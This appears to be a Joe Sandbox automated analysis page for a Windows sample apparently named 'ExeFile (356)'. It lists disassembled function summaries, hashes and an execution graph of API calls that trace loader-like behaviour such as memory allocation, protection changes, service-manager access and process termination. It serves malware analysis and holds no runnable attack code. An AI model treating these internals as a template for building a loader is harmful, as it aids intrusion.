                                    • Opcode ID: 6c28b232d037bb653eeda2a51553b0eea48fe0f0670f77926a949ef858724b48
                                    • Instruction ID: 7569b259fc3e624cf5a97b96a7300a54ad765ced98981fdc73afb8e83ec2d13a
                                    • Opcode Fuzzy Hash: 6c28b232d037bb653eeda2a51553b0eea48fe0f0670f77926a949ef858724b48
                                    • Instruction Fuzzy Hash: C011E4B5D002099FDB00EFA5D986BED7BB0FF04315F10806AF854AB251DB789A919F58
                                    Function 00414EB0 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 00414EBC
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __amsg_exit.LIBCMT ref: 00414EDC
                                    • __lock.LIBCMT ref: 00414EEC
                                    • InterlockedDecrement.KERNEL32(?), ref: 00414F09
                                    • _free.LIBCMT ref: 00414F1C
                                    • InterlockedIncrement.KERNEL32(022D1660), ref: 00414F34
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                    • String ID:
                                    • API String ID: 3470314060-0
                                    • Opcode ID: b789d6f6b5b18bbc2b778a8bb90bc3a3c2b1992aeab1e833d253d5039ca1afb1
                                    • Instruction ID: 34fd155b25c25adfe3620824084a2b0933ecb3f9ce2fde051769732d93a5196a
                                    • Opcode Fuzzy Hash: b789d6f6b5b18bbc2b778a8bb90bc3a3c2b1992aeab1e833d253d5039ca1afb1
                                    • Instruction Fuzzy Hash: 6F015B79E00721ABD711EF669805BDA7760BB44725F15801BE804A7391CB6CAEC2CBDD
                                    Function 00413191 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___BuildCatchObject.LIBCMT ref: 004131A4
                                      • Part of subcall function 004130FF: ___BuildCatchObjectHelper.LIBCMT ref: 00413135
                                    • _UnwindNestedFrames.LIBCMT ref: 004131BB
                                    • ___FrameUnwindToState.LIBCMT ref: 004131C9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                    • String ID: csm$csm
                                    • API String ID: 2163707966-3733052814
                                    • Opcode ID: 1cecf47bf90c724cacb334d80f1f1d72eb2c4336c93fda5b796e22f89546e134
                                    • Instruction ID: 9332ba3ff9db4df31153ad81b7ccdad3367009c071c3dcb25a55caf6b99e68f4
                                    • Opcode Fuzzy Hash: 1cecf47bf90c724cacb334d80f1f1d72eb2c4336c93fda5b796e22f89546e134
                                    • Instruction Fuzzy Hash: 6001FB7100110ABBDF126F51CC46EEB7F6AEF08355F044016BD1855121DB7AD9F1DBA9
                                    Function 00415631 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 0041563D
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00415654
                                    • __amsg_exit.LIBCMT ref: 00415662
                                    • __lock.LIBCMT ref: 00415672
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00415686
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 938513278-0
                                    • Opcode ID: fd4680da6a23a9f95b296ef5c36f84049bab0c1c7715a6f47702f30f0234365f
                                    • Instruction ID: e348e55c111b0dd0511f345811d13424c8a431ddd757bbd9f2e15d6ba2996f08
                                    • Opcode Fuzzy Hash: fd4680da6a23a9f95b296ef5c36f84049bab0c1c7715a6f47702f30f0234365f
                                    • Instruction Fuzzy Hash: CBF09676940B10DBD721BB7698027CD3790AF40729F54411FF5489A2D6CB6C49C1CA9D
                                    Function 0040F697 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: CloseHandleNextProcess32wsprintf
                                    • String ID: %d K
                                    • API String ID: 2912679758-2382126934
                                    • Opcode ID: 7ecdd1ab545dfd2d75c17a70661e833d6c69d2c6112979b4fa8608a3f9d8cbe6
                                    • Instruction ID: 9f36e5016d7a42e12b889a531ce412ab75a6dd073b82eecd34aa996bae1b5947
                                    • Opcode Fuzzy Hash: 7ecdd1ab545dfd2d75c17a70661e833d6c69d2c6112979b4fa8608a3f9d8cbe6
                                    • Instruction Fuzzy Hash: CA11827111830196C734AB599852BFBB3E8EFC4358F144C3EE886C3691FA7C940983AB
                                    Function 0040F6B9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: CloseHandleNextProcess32wsprintf
                                    • String ID: %d K
                                    • API String ID: 2912679758-2382126934
                                    • Opcode ID: 9982f50e09bbd1c2d9a7096a7c8064f1faae9819a40c8dc3b266ad468783cfba
                                    • Instruction ID: 51d71b27c4b37dd042226c9a40541835d3d141334fbcb817b22f35dada8c7e80
                                    • Opcode Fuzzy Hash: 9982f50e09bbd1c2d9a7096a7c8064f1faae9819a40c8dc3b266ad468783cfba
                                    • Instruction Fuzzy Hash: 1C01527110830196C734AB589852BFBB3E9EFC4354F044D3EF986C3681EA3C944887AB
                                    Function 0040E6A0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenProcess.KERNEL32(00000401,00000000,?), ref: 0040E6C6
                                      • Part of subcall function 0040E2A0: OpenProcessToken.ADVAPI32 ref: 0040E2D4
                                      • Part of subcall function 0040E2A0: CloseHandle.KERNEL32(?), ref: 0040E35E
                                    • TerminateProcess.KERNEL32(00000000,00000009), ref: 0040E6EE
                                    • CloseHandle.KERNEL32(00000000), ref: 0040E6FA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: Process$CloseHandleOpen$TerminateToken
                                    • String ID: SYSTEM
                                    • API String ID: 1755933052-968218125
                                    • Opcode ID: a96fa1f771f5afe9f1f92496620a833f797012d06dd2d3e5e1056d7510229cf3
                                    • Instruction ID: 8e2cb8a182e1328e513b3a34ec3bf5da011a535263a81edc7ae68b639948cf14
                                    • Opcode Fuzzy Hash: a96fa1f771f5afe9f1f92496620a833f797012d06dd2d3e5e1056d7510229cf3
                                    • Instruction Fuzzy Hash: C2F06275A0131067D330AB16AC0DFDB3FA8DBC9B10F418529F959E3282DA38880186AA
                                    Function 020E21A0 Relevance: 6.2, APIs: 4, Instructions: 182COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 020E21F9
                                    • SetLastError.KERNEL32(0000007E), ref: 020E223B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389523241.00000000020E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 020E1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_20e1000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: ErrorHugeLastRead
                                    • String ID:
                                    • API String ID: 3239643929-0
                                    • Opcode ID: 90f669aceeb3734c1bb66e06c95fe2cd4e1c493497a40b36449bdfc671141d82
                                    • Instruction ID: 760a9aa74f39a7e80903f3dd570bdf52e43b904cb3bd010d02fc78a68305e8e1
                                    • Opcode Fuzzy Hash: 90f669aceeb3734c1bb66e06c95fe2cd4e1c493497a40b36449bdfc671141d82
                                    • Instruction Fuzzy Hash: 7081BA74A00209EFDB04CF94C890BADBBB5FF88314F148198E90AAB355C774AA81DF90
                                    Function 0041586A Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0041589E
                                    • __isleadbyte_l.LIBCMT ref: 004158D1
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,?,00000000,00000000,?,?,?), ref: 00415902
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,00000001,00000000,00000000,?,?,?), ref: 00415970
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                    • String ID:
                                    • API String ID: 3058430110-0
                                    • Opcode ID: c0eb2632c6278a3be84097047c3844163cff7a0479a0ebec46df9903c1e59601
                                    • Instruction ID: 1bfa8a3c802f93689ab76b22000e8837c631d4e9b9b80ec41d52cc0f2dacea33
                                    • Opcode Fuzzy Hash: c0eb2632c6278a3be84097047c3844163cff7a0479a0ebec46df9903c1e59601
                                    • Instruction Fuzzy Hash: CE31D271A10646EFDB20EF64C880AEE3BB5FF81320F14856AE4659B2A1D334DDD0DB59
                                    Function 00416787 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 004167A8
                                      • Part of subcall function 0041025B: __FF_MSGBANNER.LIBCMT ref: 00410274
                                      • Part of subcall function 0041025B: __NMSG_WRITE.LIBCMT ref: 0041027B
                                      • Part of subcall function 0041025B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00413CED,?,00000001,?,?,004147E0,00000018,0041BE58,0000000C,00414870), ref: 004102A0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: 291dd56cd004a0e554d27551375521f7d94099034c9c239543eeae30dd5861c5
                                    • Instruction ID: 3c08702fd25ada2266926da53e5058be595d777b16bfef6a83bfe969bb48a588
                                    • Opcode Fuzzy Hash: 291dd56cd004a0e554d27551375521f7d94099034c9c239543eeae30dd5861c5
                                    • Instruction Fuzzy Hash: 6211EB32501611ABDB213FB5BC15ADA3794AF44378B21843BF869962A0DB3DCCC1869C
                                    Function 020E2430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 020E2468
                                    • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 020E24B2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389523241.00000000020E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 020E1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_20e1000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: @
                                    • API String ID: 544645111-2766056989
                                    • Opcode ID: fabc3a80ff7879334b2c9a73ae1c752efeac9b6b551766d6640930bd000344aa
                                    • Instruction ID: 8e90ad59043f76ee3685f25b3d2d8ee087f131de6606b73ad576d6c1b2724691
                                    • Opcode Fuzzy Hash: fabc3a80ff7879334b2c9a73ae1c752efeac9b6b551766d6640930bd000344aa
                                    • Instruction Fuzzy Hash: E821B9B0E04209EFDF54CF94C984BAEBBB9BF44304F148599ED06AB245C774AB80EB55
                                    Function 00412F0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004106ED: __getptd.LIBCMT ref: 004106F3
                                      • Part of subcall function 004106ED: __getptd.LIBCMT ref: 00410703
                                    • __getptd.LIBCMT ref: 00412F19
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00412F27
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                    • String ID: csm
                                    • API String ID: 803148776-1018135373
                                    • Opcode ID: e3664caf934b3eefaaa5df4d7cacef43b1cf49a14ce4952649e901bdecbea5d6
                                    • Instruction ID: 69b6639a9ef3a36a169a6a5565f12a55bffb05f741e2618f410494396190d148
                                    • Opcode Fuzzy Hash: e3664caf934b3eefaaa5df4d7cacef43b1cf49a14ce4952649e901bdecbea5d6
                                    • Instruction Fuzzy Hash: 80014B348002058FCF34DF26D6406EEB3B5AF20311F14462FE44496359DBB89AE6EF49
                                    Function 0040E7B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    • InitCommonControlsEx.COMCTL32 ref: 0040E7BF
                                    • CreateWindowExW.USER32(00000000,SysListView32,00419450,50010201,0000000A,00000028,00000190,000001F4,?,00000000,00000000,00000000), ref: 0040E7F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: CommonControlsCreateInitWindow
                                    • String ID: SysListView32
                                    • API String ID: 2646078016-78025650
                                    • Opcode ID: f7c3c60ebf2b29c8cd91b1213f0e9bf28fa0210beb0f04a3fb4def70d8a6e988
                                    • Instruction ID: f3d3e535e189fff61838196dd880c7fe0caa92239aab9ee536b101cdf5704626
                                    • Opcode Fuzzy Hash: f7c3c60ebf2b29c8cd91b1213f0e9bf28fa0210beb0f04a3fb4def70d8a6e988
                                    • Instruction Fuzzy Hash: 99E04F747843007FF6509B40DC5BF963764A788F05F50C024F649A51C0D6F46885866A

                                    Execution Graph

                                    Execution Coverage:4%
                                    Dynamic/Decrypted Code Coverage:76.1%
                                    Signature Coverage:3.6%
                                    Total number of Nodes:477
                                    Total number of Limit Nodes:55
                                    execution_graph 23970 40ec40 23975 40ebe0 23970->23975 23972 40ec48 23973 40ec71 VirtualAlloc 23972->23973 23974 40ec8a 23972->23974 23973->23974 23978 40e920 LoadLibraryW 23975->23978 23977 40ec09 23977->23972 23978->23977 24125 613060 24128 61307a 24125->24128 24126 61326f 24127 613215 24126->24127 24135 613e40 GetPEB 24126->24135 24128->24126 24128->24127 24129 613e40 GetPEB 24128->24129 24131 6131c3 RtlAllocateHeap 24128->24131 24133 613da0 GetPEB 24128->24133 24129->24128 24131->24127 24131->24128 24132 613283 24136 613da0 GetPEB 24132->24136 24133->24128 24135->24132 24136->24127 24564 731870 GetProcAddress 24565 410448 72 API calls ___InternalCxxFrameHandler 24629 413948 75 API calls 6 library calls 24631 73157a SetLastError 24555 616d79 24561 616d80 24555->24561 24556 616cd0 GetPEB LoadLibraryW 24556->24561 24557 616daf 24558 613480 GetPEB 24558->24561 24559 616e86 LoadLibraryW 24559->24561 24560 613e40 GetPEB 24560->24561 24561->24556 24561->24557 24561->24558 24561->24559 24561->24560 24562 613da0 GetPEB 24561->24562 24562->24561 24563 619878 GetPEB FindFirstChangeNotificationW GetCurrentProcess QueryFullProcessImageNameW lstrcmpiW 24632 418964 CloseHandle 24577 731840 LoadLibraryA 24582 615c20 39 API calls 24583 732430 VirtualProtect VirtualProtect 24584 732630 Process32Next CloseHandle 24585 412bb7 70 API calls 4 library calls 24497 619530 24503 619550 24497->24503 24498 619797 OpenSCManagerW 24498->24503 24499 6197fc 24502 61981b 24499->24502 24511 613e40 GetPEB 24499->24511 24501 613e40 GetPEB 24501->24503 24513 613000 FindFirstFileW FindNextFileW FindClose GetPEB 24502->24513 24503->24498 24503->24499 24503->24501 24505 613da0 GetPEB 24503->24505 24509 619587 24503->24509 24510 617950 GetPEB 24503->24510 24505->24503 24506 61980f 24512 613da0 GetPEB 24506->24512 24510->24503 24511->24506 24512->24502 24513->24509 23979 600000 23981 600005 23979->23981 23984 60002d 23981->23984 24004 600456 GetPEB 23984->24004 23987 600456 GetPEB 23988 600053 23987->23988 23989 600456 GetPEB 23988->23989 23990 600061 23989->23990 23991 600456 GetPEB 23990->23991 23992 60006d 23991->23992 23993 600456 GetPEB 23992->23993 23994 60007b 23993->23994 23995 600456 GetPEB 23994->23995 23998 600089 23995->23998 23996 6000e4 GetNativeSystemInfo 23997 600107 VirtualAlloc 23996->23997 24002 600029 23996->24002 23999 60012f 23997->23999 23998->23996 23998->24002 24000 6003b2 23999->24000 24001 600388 VirtualProtect 23999->24001 24006 7327b0 24000->24006 24001->23999 24001->24002 24005 600045 24004->24005 24005->23987 24009 731000 24006->24009 24012 731030 LoadLibraryW GetProcAddress 24009->24012 24053 731b30 24012->24053 24015 7310a3 24017 731b30 SetLastError 24015->24017 24016 731091 SetLastError 24049 73102b ExitProcess 24016->24049 24018 7310b9 24017->24018 24019 7310f0 24018->24019 24020 7310de SetLastError 24018->24020 24018->24049 24021 731111 24019->24021 24022 7310ff SetLastError 24019->24022 24020->24049 24023 73111c SetLastError 24021->24023 24025 73112e GetNativeSystemInfo 24021->24025 24022->24049 24023->24049 24026 7311bc 24025->24026 24027 7311d7 SetLastError 24026->24027 24028 7311e9 24026->24028 24027->24049 24056 731800 VirtualAlloc 24028->24056 24029 731202 24030 73123d GetProcessHeap RtlAllocateHeap 24029->24030 24057 731800 VirtualAlloc 24029->24057 24031 731257 SetLastError 24030->24031 24032 73127b 24030->24032 24031->24049 24036 731b30 SetLastError 24032->24036 24033 731222 24033->24030 24034 73122e SetLastError 24033->24034 24034->24049 24038 7312fb 24036->24038 24037 731302 24084 7316c0 GetProcessHeap HeapFree VirtualFree 24037->24084 24038->24037 24058 731800 VirtualAlloc 24038->24058 24039 731320 24059 731b50 24039->24059 24042 73136b 24042->24037 24065 7321a0 24042->24065 24046 7313ca 24046->24037 24047 7313eb 24046->24047 24048 7313ff GetPEB 24047->24048 24047->24049 24048->24049 24054 731070 24053->24054 24055 731b3b SetLastError 24053->24055 24054->24015 24054->24016 24054->24049 24055->24054 24056->24029 24057->24033 24058->24039 24063 731b7d 24059->24063 24060 731b30 SetLastError 24061 731c32 24060->24061 24062 731be9 24061->24062 24085 731800 VirtualAlloc 24061->24085 24062->24042 24063->24060 24063->24062 24066 7313b5 24065->24066 24067 7321dd IsBadHugeReadPtr 24065->24067 24066->24037 24078 731e80 24066->24078 24067->24066 24069 732207 24067->24069 24069->24066 24070 732239 SetLastError 24069->24070 24071 73224d 24069->24071 24070->24066 24086 731a20 VirtualQuery VirtualFree VirtualAlloc 24071->24086 24073 732267 24074 732273 SetLastError 24073->24074 24076 73229d 24073->24076 24074->24066 24076->24066 24077 7323ae SetLastError 24076->24077 24077->24066 24081 731eba 24078->24081 24079 731fe5 24080 731d10 2 API calls 24079->24080 24083 731fc1 24080->24083 24081->24079 24081->24083 24087 731d10 24081->24087 24083->24046 24084->24049 24085->24062 24086->24073 24088 731d29 24087->24088 24092 731d1f 24087->24092 24089 731d37 24088->24089 24090 731d9d VirtualProtect 24088->24090 24089->24092 24094 731820 VirtualFree 24089->24094 24090->24092 24092->24081 24094->24092 24298 615f00 24304 615f13 24298->24304 24299 615fc5 24321 613580 GetPEB 24299->24321 24300 615fbe 24303 615fd1 24305 615ff3 24303->24305 24336 613e40 GetPEB 24303->24336 24304->24299 24304->24300 24334 613e40 GetPEB 24304->24334 24335 613da0 GetPEB 24304->24335 24322 615410 24305->24322 24309 615fe7 24337 613da0 GetPEB 24309->24337 24312 616035 24317 61605d 24312->24317 24340 613e40 GetPEB 24312->24340 24313 61601f 24338 613e40 GetPEB 24313->24338 24315 616029 24339 613da0 GetPEB 24315->24339 24319 616051 24341 613da0 GetPEB 24319->24341 24321->24303 24323 615426 24322->24323 24328 61543c 24322->24328 24342 613e40 GetPEB 24323->24342 24325 615430 24343 613da0 GetPEB 24325->24343 24327 6154b3 _snprintf 24327->24312 24327->24313 24328->24327 24329 61549b GetVolumeInformationW 24328->24329 24344 613e40 GetPEB 24328->24344 24329->24327 24331 61548a 24345 613da0 GetPEB 24331->24345 24333 615496 24333->24329 24334->24304 24335->24304 24336->24309 24337->24305 24338->24315 24339->24312 24340->24319 24341->24317 24342->24325 24343->24328 24344->24331 24345->24333 24637 414920 5 API calls 2 library calls 24396 41092e 24446 411e80 24396->24446 24398 41093a GetStartupInfoW 24399 41094e HeapSetInformation 24398->24399 24401 410959 24398->24401 24399->24401 24447 412a4c HeapCreate 24401->24447 24402 4109a7 24403 4109b2 24402->24403 24473 410905 66 API calls 3 library calls 24402->24473 24474 413a77 86 API calls 4 library calls 24403->24474 24406 4109b8 24407 4109c4 __RTC_Initialize 24406->24407 24408 4109bc 24406->24408 24448 4143af 73 API calls __calloc_crt 24407->24448 24475 410905 66 API calls 3 library calls 24408->24475 24410 4109c3 24410->24407 24412 4109d1 24413 4109d5 24412->24413 24414 4109dd GetCommandLineA 24412->24414 24476 412820 66 API calls 3 library calls 24413->24476 24449 414318 71 API calls 2 library calls 24414->24449 24418 4109ed 24477 41425d 95 API calls 3 library calls 24418->24477 24420 4109f7 24421 410a03 24420->24421 24422 4109fb 24420->24422 24450 413fe7 94 API calls 7 library calls 24421->24450 24478 412820 66 API calls 3 library calls 24422->24478 24426 410a08 24427 410a14 24426->24427 24428 410a0c 24426->24428 24451 4125ff 77 API calls 4 library calls 24427->24451 24479 412820 66 API calls 3 library calls 24428->24479 24432 410a1b 24433 410a20 24432->24433 24434 410a27 24432->24434 24480 412820 66 API calls 3 library calls 24433->24480 24452 413f88 94 API calls 2 library calls 24434->24452 24438 410a2c 24439 410a32 24438->24439 24453 40fa80 24438->24453 24439->24438 24441 410a48 24442 410a56 24441->24442 24481 4127d6 66 API calls _doexit 24441->24481 24482 412802 66 API calls _doexit 24442->24482 24445 410a5b __setmbcp 24446->24398 24447->24402 24448->24412 24449->24418 24450->24426 24451->24432 24452->24438 24483 4101c0 24453->24483 24455 40fa93 LoadIconW LoadCursorW LoadIconW CreateThread 24456 40fb38 24455->24456 24489 40ecc0 24455->24489 24457 40fb3d RegisterClassExW 24456->24457 24458 40fb6e CreateWindowExW 24457->24458 24459 40fb4f MessageBoxW 24457->24459 24460 40fbb1 MessageBoxW 24458->24460 24461 40fbcf CreateWindowExW CreateWindowExW CreateWindowExW 24458->24461 24459->24441 24460->24441 24485 40e7b0 InitCommonControlsEx CreateWindowExW 24461->24485 24463 40fc70 24486 40e800 11 API calls __except_handler4 24463->24486 24465 40fc7b CreateWindowExW CreateWindowExW CreateWindowExW CreateWindowExW 24487 40e220 9 API calls __except_handler4 24465->24487 24467 40fd48 24488 40f770 143 API calls 24467->24488 24469 40fd4d SetTimer ShowWindow UpdateWindow GetMessageW 24470 40fd97 24469->24470 24472 40fdc3 24469->24472 24471 40fda4 TranslateMessage DispatchMessageW GetMessageW 24470->24471 24471->24471 24471->24472 24472->24441 24473->24403 24474->24406 24475->24410 24477->24420 24481->24442 24482->24445 24484 4101cc 24483->24484 24484->24455 24484->24484 24485->24463 24486->24465 24487->24467 24488->24469 24490 40ecc6 24489->24490 24644 40e930 81 API calls __except_handler4 24593 418a30 76 API calls __cinit 24594 413e30 SetUnhandledExceptionFilter 24645 617b10 FindFirstFileW FindNextFileW FindClose GetPEB 24137 6152e0 24141 6152f0 24137->24141 24138 6153d7 24139 